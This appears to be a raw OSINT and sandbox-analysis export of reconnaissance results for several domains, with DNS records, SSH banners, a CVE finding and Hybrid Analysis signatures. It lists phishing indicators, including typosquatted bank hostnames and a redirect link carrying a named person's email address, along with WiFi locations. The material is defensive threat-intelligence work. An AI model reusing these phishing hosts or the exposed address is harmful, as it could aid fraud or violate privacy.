"msedge.exe" (UID: 00000000-00000420)\n Launches browser "msedge.exe" (UID: 00000000-00006500)\n Launches browser "msedge.exe" (UID: 00000000-00006936)\n Launches browser "msedge.exe" (UID: 00000000-00002696)\n Launches browser "msedge.exe" (UID: 00000000-00005140)\n Launches browser "msedge.exe" (UID: 00000000-00004120)\n Launches browser "msedge.exe" (UID: 00000000-00004536)\n Launches browser "msedge.exe" (UID: 00000000-00002404)\n Launches browser "msedge.exe" (UID: 00000000-00006928)\n Launches browser "msedge.exe" (UID: 00000000-00006236)\n Launches browser "msedge.exe" (UID: 00000000-00004364)\n Launches browser "msedge.exe" (UID: 00000000-00005160)'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"<!DOCTYPE html>\n<html lang="en-US"><meta charset="utf-8">\n<title>Chris Titus Tech | Tech Content Creator</title>\n\n<meta name="author" content="Chris Titus">\n<meta name="description" content="Having Fun with Technology">\n\n\n\n<meta name="author" content="Chris Titus">\n<meta name="generator" content="Hugo 0.101.0" />\n\n mobile responsive meta -->\n<meta name="viewport" content="width=device-width\n initial-scale=1\n maximum-scale=5">\n\n Favicon -->\n<link rel="icon" href="https://christitus.com/images/favicon.png" type="image/x-icon">\n\n\n\n<script type="application/javascript">\nvar doNotTrack = false;\nif (!doNotTrack) {\n(function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObject\']=r;i[r]=i[r]||function(){\n(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\nm=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n})(window,document,\'script\',\'https://www.google-analytics.com/analytics.js\',\'ga\');\nga(\'create\', \'UA-5817718-4\', \'auto\');\n\nga(\'send\', \'page" (Indicator: "send")\n "is Titus">\n<meta name="description" content="Having Fun with Technology">\n\n\n\n<meta name="author" content="Chris Titus">\n<meta name="generator" content="Hugo 0.101.0" />\n\n mobile responsive meta -->\n<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">\n\n Favicon -->\n<link rel="icon" href="https://christitus.com/images/favicon.png" type="image/x-icon">\n\n\n\n<script type="application/javascript">\nvar doNotTrack = false;\nif (!doNotTrack) {\n(function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObject\']=r;i[r]=i[r]||function(){\n(i[r].q=i[r].q||[]).push(arguments)}\ni[r].l=1*new Date();a=s.createElement(o)\n\nm=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n})(window,document,\'script\',\'https://www.google-analytics.com/analytics.js\',\'ga\');\nga(\'create\', \'UA-5817718-4\', \'auto\');\n\nga(\'send\', \'pageview\');\n}\n</script>\n\n\n\n<script>\n (function (w, d, s, l, i) {\n w[l] = w[l] || [];\n w[l].push({\n \'gtm.start\': new Date().getTime()\n" (Indicator: "send"), "event: \'gtm.js\'\n });\n var f = d.getElementsByTagName(s)[0]\n\n j = d.createElement(s)\n\n dl = l != \'dataLayer\' ? \'&l=\' + l : \'\';\n j.async = true;\n j.src = \'https://www.googletagmanager.com/gtm.js?id=\' + i + dl;\n f.parentNode.insertBefore(j, f);\n })(window, document, \'script\', \'dataLayer\', \'GTM-5JNJ8NL\');\n</script>\n\n\n\n<link rel="amphtml" type="text/html" href="https://christitus.com/amp/" title="Chris Titus Tech | Tech Content Creator" />\n<link rel="alternate" type="application/rss+xml" href="https://christitus.com/index.xml" title="Chris Titus Tech | Tech Content Creator" />\n<link rel="alternate" type="application/json" href="https://christitus.com/index.json" title="Chris Titus Tech | Tech Content Creator" />\n\n \n<link rel="preconnect" href="https://fonts.gstatic.com">\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<style crossorigin="anonymous" media="all" type="text/css" integrity="sha512-+PN/fcoUb5XuLwnJWEg/QUlQ57vePLVQwn/BZpXTd9zB5zN6fEtzTpWtFS0fdl2BK2K0SSE0j/STHWxJkrpPLw==">/*!* Bo" (Indicator: "connect"), "amily:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}article\naside\nfigcaption\nfigure\nfooter\nheader\nhgroup\nmain\nnav\nsection{display:block}body{margin:0;font-family:-apple-system\nBlinkMacSystemFont\nsegoe ui\nRoboto\nhelvetica neue\nArial\nnoto sans\nliberation sans\nsans-serif\napple color emoji\nsegoe ui emoji\nsegoe ui symbol\nnoto color emoji;font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;background-color:#fff}[tabindex="-1"]:focus:not(:focus-visible){outline:0!important}hr{box-sizing:content-box;height:0;overflow:visible}h1\nh2\nh3\nh4\nh5\nh6{margin-top:0;margin-bottom:.5rem}p{margin-top:0;margin-bottom:1rem}abbr[data-original-title]\nabbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl\nol\nul{margin-top:0;margin-bottom:1rem" (Indicator: "bind"), "isplay:inline-block;margin-bottom:.5rem}button{border-radius:0}button:focus:not(:focus-visible){outline:0}button\ninput\noptgroup\nselect\ntextarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button\ninput{overflow:visible}button\nselect{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[type=button]\n[type=reset]\n[type=submit]\nbutton{-webkit-appearance:button}[type=button]:not(:disabled)\n[type=reset]:not(:disabled)\n[type=submit]:not(:disabled)\nbutton:not(:disabled){cursor:pointer}[type=button]::-moz-focus-inner\n[type=reset]::-moz-focus-inner\n[type=submit]::-moz-focus-inner\nbutton::-moz-focus-inner{padding:0;border-style:none}input[type=checkbox]\ninput[type=radio]{box-sizing:border-box;padding:0}textarea{overflow:auto;resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{display:block;width:100%;max-width:100%;padding:0;margin-bottom:.5rem;font-size:1.5rem;line-height:inherit;color:inherit;white-space:normal}progress{vertical-align:baseline}[type=number" (Indicator: "select"), "ype=time].form-control{-webkit-appearance:none;-moz-appearance:none;appearance:none}select.form-control:focus::-ms-value{color:#495057;backgroun | 34.148.97.127 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_3.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:44:22 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.108.153 |
| 2023-05-12 02:53:49 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 926E:68C5:23DED94:340F30D:645D2C8B
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100050-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683827851.292615,VS0,VE22
Vary: Accept-Encoding
X-Fastly-Request-ID: 7edd7f29f5c97925d836dfcf6284b65fe4dca468
| 2606:50c0:8000::153 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 16 | 0 | 1 | 0 | None | 2606:4700:3031::ac43:8709 | ayhu.xyz |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | curve25519-sha256@libssh.org | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=nwapi2.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000justin000.github.io |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 223.30.196.104.bc.googleusercontent.com | 104.196.30.223 |
| 2023-05-12 03:09:59 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | inbox.clientify.net | 165.232.113.82 |
| 2023-05-12 03:02:53 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | oldfluid.battleb0t.xyz |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.30): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.135.9 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet2C26 (Net ID: 00:01:36:4F:2C:24) | 34.0544, -118.244 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:3C:B8:8B) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 03:23:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.1:8080 | 188.114.96.0/24 |
| 2023-05-12 02:54:30 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 64.226.81.43:80 | 64.226.81.43 |
| 2023-05-12 02:45:58 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/twbs/bootstrap/blob/master/license)', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fcopernicus.es%2Fdaniel.gomez%40copernicus.es', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_eac_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_eac_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_eac_IE_EarlyTabStart_0xc48_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_eac_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_eac_IESQMMUTEX_0_331"\n "IsoScope_eac_ConnHashTable<3756>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3756"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.40.106:443"\n "102.37.125.193:443"\n "35.186.254.174:443"\n "104.18.10.207:443"\n "104.26.8.175:443"\n "142.251.214.131:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "fonts.gstatic.com"\n "llink.to"\n "stackpath.bootstrapcdn.com"\n "tamannigeria.org"\n "track.salesflare.com"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1114', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "daniel.gomez@copernicus.es"\n Pattern match: "w@e.w"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1B1E.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1938.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003772]\n "Cab1937.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1937.tmp]- [targetUID: 00000000-00003772]\n "Cab1B1D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1B1D.tmp]- [targetUID: 00000000-00003772]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "recaptcha__en_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Tar1B1E.tmp" has type "data"- Location: [%TEMP%\\Tar1B1E.tmp]- [targetUID: 00000000-00003772]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003772]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "anchor_1_.htm" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmYUtfBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto BlackRegularVersion 2.137; 2017Roboto-Bla"- [targetUID: N/A]\n "~DF4104C3A156FD39C8.TMP" has type "data"- Location: [%TEMP%\\~DF4104C3A156FD39C8.TMP]- [targetUID: 00000000-00003756]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "~DFB793AC7F13A190A4.TMP" has type "data"- Location: [%TEMP%\\~DFB793AC7F13A190A4.TMP]- [targetUID: 00000000-00003756]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003756]\n "~DFC3A186B09A1D8AC1.TMP" has type "data"- Location: [%TEMP%\\~DFC3A186B09A1D8AC1.TMP]- [targetUID: 00000000-00003756]\n "~DFA5A15892CE259FFA.TMP" has type "data"- Location: [%TEMP%\\~DFA5A15892CE259FFA.TMP]- [targetUID: 00000000-00003756]\n "~DFFFDE3D6507148FFE.TMP" has type "data"- Location: [%TEMP%\\~DFFFDE3D6507148FFE.TMP]- [targetUID: 00000000-00003756]\n "microsoft_PNG7_1_.png" has type "PNG image data 2096 x 771 8-bit colormap non-interlaced"- [targetUID: N/A]\n "_5F23AB45-DA89-11ED-AE70-080027198B7C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39', u'name': u'Drops XML files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 8, u'description': u'"www.google_1_.xml" has type "ASCII text with no line terminators"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fcopernicus.es%2Fdaniel.gomez%40copernicus.es"\n Pattern match: "https://llink.to"\n Pattern match: "https://www.gstatic.com/recaptcha/releases/6MY32oPwFCn9SUKWt8czDsDw/recaptcha__en.js"\n Pattern match: "https://www.google.com/recaptcha/api2/\';(cfg[\'render\']=cfg[\'render\']||[]).push(\'onload\');w[\'__google_recaptcha_client\']=true;var"\n Pattern match: "MUID0E9D24B2F451684D29613641F5D56964msn.com/1025288302553631105309164827182731026838*"\n Pattern match: "fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxP.ttf"\n Pattern match: "fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc9.ttf"\n Pattern match: "fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc9.ttf"\n Pattern match: "https://www.gstatic.com/recaptcha/releases/6MY32oPwFCn9SUKWt8czDsDw/styles__ltr.css"\n Pattern match: "https://www.google.com/recaptcha/api2/"\n Pattern match: "https://api.salesflare.com/,a=new"\n Pattern match: "SUIDMmicrosoft.com/9216274053632031026955164499057731026838*MUID02215E7CD9936B0700024C8FD8DF6A54microsoft.com/1025287302553631105309164499057731026838*SRCHDAF=NOFORMmicr | 185.199.111.153 |
